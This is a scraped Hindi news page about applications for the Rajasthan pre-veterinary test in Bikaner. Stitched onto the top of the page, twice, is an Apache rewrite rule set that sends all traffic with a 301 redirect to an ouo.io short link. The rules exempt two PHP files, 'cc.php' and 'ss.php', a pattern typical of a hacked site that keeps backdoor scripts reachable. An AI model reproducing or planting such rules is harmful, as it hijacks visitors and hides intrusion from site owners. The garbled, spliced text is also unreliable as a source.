
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 829
Previousबीकानेर। बीवीएससी एंड एएच स्नातक पाठ्यक्रम में प्रवेश के लिए होने वाले प्री-वेटरनरी टेस्ट आगामी 10 जून को सुबह 10 बजे से 1 बजे तक होगा। परीक्षा के ऑनलाइन आवेदन की प्रक्रिया चल रही है। अभ्यर्थी 15 अप्रैल तक सामान्य फीस के साथ ऑनलाइन आवेदन कर सकेंगे। इसके बाद 16 से 22 अप्रैल तक विलंब शुल्क सहित आवेदन किए जा सकेंगे। राजस्थान प्री-वेटरनरी टेस्ट के संयोजक प्रो.ए.पी.सिंह ने बताया कि राजस्थान का मूल निवासी जिसकी आयु 31 दिसंबर, 2018 तक न्यूनतम 17 साल और अधिकतम 25 वर्ष होगी वे आवेदन के पात्र होंगे। इसके अलावा आवेदक को 12वीं कक्षा जीव विज्ञान एवं बायोटेक्नोलॉजी विषय के साथ उत्तीर्ण होना आवश्यक है।